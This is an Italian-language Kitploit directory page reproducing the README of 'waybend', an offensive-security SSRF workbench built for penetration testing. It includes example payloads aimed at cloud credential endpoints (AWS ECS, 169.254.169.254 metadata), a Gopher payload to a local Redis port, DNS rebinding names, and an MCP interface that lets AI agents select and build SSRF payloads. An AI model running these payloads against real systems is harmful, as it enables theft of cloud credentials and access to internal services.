Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
waybend — Workbench self-hosted per SSRF redirect, payload, callback e DNS | Kitploit
Strumenti/GitHubGitHub/principlebreach/waybend
RicognizioneGenerazione di PayloadAnalisi delle VulnerabilitàScripting e AutomazioneSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingCommand and ControlUtilità e FrameworkRed Teaming
5513 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Analisi DNS
GitHubprinciplebreach/waybend

waybend

Workbench self-hosted per SSRF redirect, payload, callback e DNS

Vedi RepositorySito web
Condividi
Principle Breach

Waybend logo

Waybend

Infrastruttura SSRF self-hosted per catene di redirect, payload di protocollo esatti, callback, DNS rebinding e raccolta di evidenze sulle richieste. Un singolo binario Rust fornisce il workbench web, l'API JSON, il responder DNS autoritativo e l'interfaccia MCP su stdio.

Installazione

Installa con Homebrew:

root@kitploit:~
brew install principlebreach/tap/waybend

Le release con tag pubblicano anche binari firmati per Linux, macOS e Windows nella pagina delle release, oltre a un container multi-piattaforma su ghcr.io/principlebreach/waybend.

Compila dai sorgenti con Rust 1.88 o superiore:

root@kitploit:~
git clone https://github.com/PrincipleBreach/waybend.git
cd waybend
cargo build --release --locked

Avvio

root@kitploit:~
waybend init waybend.yml
waybend validate --config waybend.yml
waybend serve --config waybend.yml
Scarica lo strumento

Apri http://localhost:8080. Ogni voce del catalogo mostra sia l'URL Waybend pronto da copiare sia il suo esatto target finale:

root@kitploit:~
Waybend URL   http://localhost:8080/r/aws-ecs-v2?token=case-17
Final target http://169.254.170.2/v2/credentials/

Usa Docker Compose per un deployment locale persistente:

root@kitploit:~
cp waybend.example.yml waybend.yml
docker compose up --build -d

Consulta Per iniziare per container, binari nativi, validazione e il primo test di redirect.

Cosa fa

  • Esegue catene deterministiche da 1 a 10 hop con risposte 301, 302, 303, 307 o 308.
  • Preserva gli esatti target terminali, inclusi schemi non-HTTP e byte codificati.
  • Include 562 route integrate; configurare il DNS autoritativo aggiunge 16 route di rebind.
  • Cattura callback HTTP, osservazioni dei redirect e risposte DNS in SQLite.
  • Carica pacchetti di payload YAML rigorosi senza ricompilare il binario.
  • Fornisce agli agenti cinque strumenti MCP tipizzati tramite una skill Waybend portabile.

Il catalogo copre metadata cloud, forme di indirizzi loopback e di rete privata, differenziali dei parser URL, target su file locali e route Gopher incapsulate nel protocollo. Il confine del protocollo e i riferimenti principali sono documentati in Payload di protocollo.

Come si usa

Cerca o esporta il catalogo senza avviare un server:

root@kitploit:~
waybend catalog --config waybend.yml --query metadata
waybend catalog --config waybend.yml --category internal-service --format csv

Costruisci un redirect dinamico che preserva i byte:

root@kitploit:~
waybend encode --config waybend.yml --status 307 --hops 2 \
  'Gopher://127.0.0.1:6379/_INFO%0D%0APING'

Correla una route con ?token=<value>, poi interroga le sue osservazioni:

root@kitploit:~
waybend evidence --config waybend.yml list --token case-17 --json

Esegui waybend --help o waybend <command> --help per la superficie dei comandi installati.

Integrazione con gli agenti

Avvia il server MCP su standard input/output:

root@kitploit:~
waybend mcp --config /absolute/path/to/waybend.yml

Espone search_payloads, get_payload, build_redirect, dns_rebind_name e list_evidence. La skill Waybend guida un agente a selezionare un insieme mirato di payload, preservare i byte del protocollo, riutilizzare un unico token di correlazione e riportare le evidenze osservate.

Consulta Integrazione con gli agenti per la configurazione del client MCP, gli schemi degli strumenti e l'installazione della skill.

DNS Rebinding

Delega una zona a Waybend, abilita il DNS e pubblica sia la porta 53 UDP sia TCP. I nomi di query codificano un comportamento statico, alternato o TOCTOU deterministico:

root@kitploit:~
127-0-0-1.static.rb.example.com
198-51-100-10.127-0-0-1.alt.rb.example.com
198-51-100-10.169-254-169-254.2.toctou.rb.example.com

Prefissa un nome con t-<token>. per unire le evidenze DNS e HTTP. Consulta DNS rebinding per delega, codifica IPv6 e regole di sequenza.

Documentazione

  • Configurazione — ogni campo YAML e override d'ambiente.
  • API HTTP — redirect, callback, evidenze, health ed errori.
  • Pacchetti di payload — aggiungi target esatti e header di risposta.
  • Deployment — container, proxy TLS, DNS, storage e log.
  • Architettura — confini dei processi e ciclo di vita dei dati.

Contribuire

Leggi CONTRIBUTING.md. Segnala le vulnerabilità tramite SECURITY.md.

Licenza

MIT — vedi LICENSE.


Built by Principle Breach — offensive security research.